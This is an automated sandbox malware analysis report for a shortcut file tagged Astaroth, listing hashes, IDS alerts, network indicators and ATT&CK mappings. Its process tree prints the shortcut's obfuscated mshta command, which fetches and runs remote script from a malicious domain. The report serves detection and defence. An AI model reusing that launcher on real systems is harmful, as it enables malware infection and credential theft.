Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
V323904LY3.lNK.lnk

Overview

General Information

Sample name:V323904LY3.lNK.lnk
Analysis ID:1546603
MD5:2e4c1c46c2c57baf20ef148ec89e47a2
SHA1:2823f47f3da40c531b538c8edc037c93325dabc5
SHA256:8c787fa0ec9be5bf076e6c25682a7926aa188a5b9378066008785f165765bc34
Tags:AstarothGuildmalnkuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 5744 cmdline: C:\Windows\System32\MShTa "jAvasCRipT:try{try{var _10xlBOKJ=['\x44\x55\x44\x52\67\116\x39','\x73\143\162\151\x70\164\x3a\x68\x54\x74\x70\x53\x3a\x2f\x2f\160\x6c\x65\156\x69\154\x33\x32\64\x2e\x72\x65\x6e\155\x61\x72\153\56\x6f\x72\147\x2f\77\65\57'];GetObject(_10xlBOKJ[1])[_10xlBOKJ[0]]();}catch(e){}}catch(e){}close()" >nul 2>&1 >nul 2>&1&&exit MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-01T08:28:19.648837+010020229301A Network Trojan was detected20.12.23.50443192.168.2.462820TCP
2024-11-01T08:28:58.464126+010020229301A Network Trojan was detected20.12.23.50443192.168.2.462826TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-01T08:28:01.896363+010028512881A Network Trojan was detected192.168.2.449730188.114.96.3443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: V323904LY3.lNK.lnkVirustotal: Detection: 22%Perma Link
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.138.94:443 -> 192.168.2.4:62814 version: TLS 1.2

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2851288 - Severity 1 - ETPRO MALWARE Astaroth Stealer Activity (GET) : 192.168.2.4:49730 -> 188.114.96.3:443
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:62820
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:62826
Source: global trafficHTTP traffic detected: GET /?5/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: plenil324.renmark.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.google.com.br
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.138.94
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /?5/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: plenil324.renmark.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.google.com.br
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: })();</script><div id="mngb"><div id=gbar><nobr><b class=gb1>Search</b> <a class=gb1 href="https://www.google.com.br/imghp?hl=en&tab=wi">Images</a> <a class=gb1 href="https://maps.google.com/maps?hl=en&tab=wl">Maps</a> <a class=gb1 href="https://play.google.com/?hl=en&tab=w8">Play</a> <a class=gb1 href="https://www.youtube.com/?tab=w1">YouTube</a> <a class=gb1 href="https://news.google.com/?tab=wn">News</a> <a class=gb1 href="https://mail.google.com/mail/?tab=wm">Gmail</a> <a class=gb1 href="https://drive.google.com/?tab=wo">Drive</a> <a class=gb1 style="text-decoration:none" href="https://www.google.com/intl/en/about/products?tab=wh"><u>More</u> &raquo;</a></nobr></div><div id=guser width=100%><nobr><span id=gbn class=gbi></span><span id=gbf class=gbf></span><span id=gbe></span><a href="http://www.google.com/history/optout?hl=en" class=gb4>Web History</a> | <a href="/preferences?hl=en" class=gb4>Settings</a> | <a target=_top id=gb_70 href="https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com.br/&ec=GAZAAQ" class=gb4>Sign in</a></nobr></div><div class=gbh style=left:0></div><div class=gbh style=right:0></div></div><center><br clear="all" id="lgpd"><div id="XjhHGf"><img alt="Google" height="92" src="/images/branding/googlelogo/1x/googlelogo_white_background_color_272x92dp.png" style="padding:28px 0 14px" width="272" id="hplogo"><br><br></div><form action="/search" name="f"><table cellpadding="0" cellspacing="0"><tr valign="top"><td width="25%">&nbsp;</td><td align="center" nowrap=""><input value="en" name="hl" type="hidden"><input name="source" type="hidden" value="hp"><input name="biw" type="hidden"><input name="bih" type="hidden"><div class="ds" style="height:32px;margin:4px 0"><input class="lst" style="margin:0;padding:5px 8px 0 6px;vertical-align:top;color:#000" autocomplete="off" value="" title="Google Search" maxlength="2048" name="q" size="57"></div><br style="line-height:0"><span class="ds"><span class="lsbb"><input class="lsb" value="Google Search" name="btnG" type="submit"></span></span><span class="ds"><span class="lsbb"><input class="lsb" id="tsuid_1" value="I'm Feeling Lucky" name="btnI" type="submit"><script nonce="RXNHAXUkhkvUFFm7j6blOQ">(function(){var id='tsuid_1';document.getElementById(id).onclick = function(){if (this.form.q.value){this.checked = 1;if (this.form.iflsig)this.form.iflsig.disabled = false;} equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: plenil324.renmark.org
Source: global trafficDNS traffic detected: DNS query: www.google.com.br
Source: mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1695505386.000001C17827D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: hTtpS://plenil324.renmark.org/?5/
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: http://schema.org/WebPage
Source: mshta.exe, 00000001.00000003.1694050768.000001C1783D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: mshta.exe, 00000001.00000003.1694050768.000001C1783D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=https://www.google.com.br/&ec=G
Source: mshta.exe, 00000001.00000002.1696878826.000001C178373000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694182574.000001C17837D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B975885000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696074559.000001B97588A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C178380000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B9758EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696538335.000001B97588B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: https://drive.google.com/?tab=wo
Source: mshta.exe, 00000001.00000003.1694805434.000001B975885000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696074559.000001B97588A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696538335.000001B97588B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: https://maps.google.com/maps?hl=en&tab=wl
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: https://news.google.com/?tab=wn
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plenil324.renmark.org/
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plenil324.renmark.org/?5/
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plenil324.renmark.org/?5/.
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plenil324.renmark.org/?5/X
Source: mshta.exe, 00000001.00000002.1696568818.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1696088339.000001B9758AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694805434.000001B9758AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plenil324.renmark.org/?5/lF
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plenil324.renmark.org/?5/s
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plenil324.renmark.org/o
Source: mshta.exe, 00000001.00000002.1696878826.000001C178378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com.br
Source: mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com.br/
Source: mshta.exe, 00000001.00000002.1696878826.000001C178378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com.br/4
Source: mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com.br/AGKb
Source: mshta.exe, 00000001.00000003.1694182574.000001C1783AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696917675.000001C1783AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com.br/IGSb
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: https://www.google.com.br/imghp?hl=en&tab=wi
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: https://www.google.com.br/setprefdomain?prefdom=US&amp;sig=K_9c1NRihZ1C8fmrqCmNFA0_i0-OY%3D
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: https://www.google.com.br/setprefs?sig=0_1xoWnLa32iKp4MY2y_e7W7aV5SQ%3D&amp;hl=pt-BR&amp;source=home
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drString found in binary or memory: https://www.youtube.com/?tab=w1
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62814
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.138.94:443 -> 192.168.2.4:62814 version: TLS 1.2
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal64.winLNK@1/1@2/2
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\OY4DPIF3.htmJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: V323904LY3.lNK.lnkVirustotal: Detection: 22%
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: mshta.exe, 00000001.00000002.1696618599.000001B975914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1694234018.000001B975914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B975914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000001.00000003.1694234018.000001B9758C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.1696618599.000001B9758C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.1693993864.000001B9758C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
Source: unknownProcess created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta "javascript:try{try{var _10xlbokj=['\x44\x55\x44\x52\67\116\x39','\x73\143\162\151\x70\164\x3a\x68\x54\x74\x70\x53\x3a\x2f\x2f\160\x6c\x65\156\x69\154\x33\x32\64\x2e\x72\x65\x6e\155\x61\x72\153\56\x6f\x72\147\x2f\77\65\57'];getobject(_10xlbokj[1])[_10xlbokj[0]]();}catch(e){}}catch(e){}close()" >nul 2>&1 >nul 2>&1&&exit
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
DLL Side-Loading		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager12
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
V323904LY3.lNK.lnk11%ReversingLabsBinary.Malware.Nioc
V323904LY3.lNK.lnk22%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
www.google.com.br0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://csp.withgoogle.com/csp/gws/other-hp0%URL Reputationsafe
http://schema.org/WebPage0%URL Reputationsafe
https://plenil324.renmark.org/?5/0%VirustotalBrowse
https://play.google.com/?hl=en&tab=w80%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
plenil324.renmark.org
188.114.96.3
truetrue
    		unknown
    www.google.com.br
    		unknown
    		unknownfalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://plenil324.renmark.org/?5/trueunknown
    https://www.google.com.br/false
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://www.google.com.br/setprefdomain?prefdom=US&amp;sig=K_9c1NRihZ1C8fmrqCmNFA0_i0-OY%3Dmshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalse
        		unknown
        https://play.google.com/?hl=en&tab=w8mshta.exe, 00000001.00000003.1691541555.000001C178195000.00000004.00000020.00020000.00000000.sdmp, OY4DPIF3.htm.1.drfalseunknown
